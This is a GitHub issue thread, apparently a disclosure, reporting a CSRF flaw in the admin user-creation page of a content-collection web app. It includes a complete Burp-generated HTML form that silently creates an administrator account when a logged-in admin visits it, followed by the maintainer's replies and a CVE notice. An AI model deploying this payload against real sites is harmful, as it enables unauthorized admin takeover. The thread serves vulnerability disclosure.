Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

后台添加用户CSRF漏洞 #9

Closed
sevck opened this issue May 22, 2018 · 4 comments
Closed

后台添加用户CSRF漏洞 #9

sevck opened this issue May 22, 2018 · 4 comments

Comments

@sevck
Copy link

sevck commented May 22, 2018

描述:
在后台添加用户处,没有验证Referer和增加token,攻击者可构造表单进行CSRF攻击。

漏洞类型:
CSRF

攻击载体:
1.攻击者构造表单,a.com/csrf.html

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.197.25/skycaiji/index.php?m=admin&c=user&a=add" method="POST">
      <input type="hidden" name="groupid" value="2" />
      <input type="hidden" name="username" value="demo" />
      <input type="hidden" name="password" value="demo123" />
      <input type="hidden" name="repassword" value="demo123" />
      <input type="hidden" name="email" value="admin&#64;admin&#46;com" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

2.网站管理员点击攻击者网站,a.com/csrf.com,即可添加管理员

攻击影响:
攻击者访问此页面即可添加网站管理员账号

@zorlan
Copy link
Owner

zorlan commented May 25, 2018

感谢反馈,所有后台操作都是需要管理员账号登录才能执行的,经测试,不登录执行不了的,后期完善会加入token确保表单安全性

@sevck
Copy link
Author

sevck commented May 29, 2018

是需要登录,这个不是越权。@zorlan 可以了解一下CSRF攻击。

@imdupeng
Copy link

就是跨域嘛,在另一个站点登录获取的session可以直接在其他站点使用

@sevck sevck closed this as completed Nov 28, 2018
@NicoleG25
Copy link

这个问题解决了吗 ?
请注意,已分配 CVE-2018-11371
@sevck

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

4 participants